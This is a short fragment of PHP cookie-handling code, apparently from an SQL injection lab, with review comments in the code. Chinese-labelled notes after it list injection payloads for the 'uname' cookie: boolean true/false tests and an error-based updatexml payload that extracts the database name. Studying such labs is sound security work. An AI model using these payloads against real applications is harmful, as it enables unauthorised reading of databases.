echo " Your Cookie is deleted";
setcookie('uname', $row1['username'], time() - 3600); // $row1 is undefined on this path; the past expiry is what clears the cookie
header('Location: index.php'); // NOTE(review): issued after output; only takes effect if output buffering is enabled
}
}
// 测试
[cookie] uname=Dumb 'and 1=1 --+
[cookie] uname=Dumb 'and 1=2 --+
// 报错注入
[cookie] uname=Dumb 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+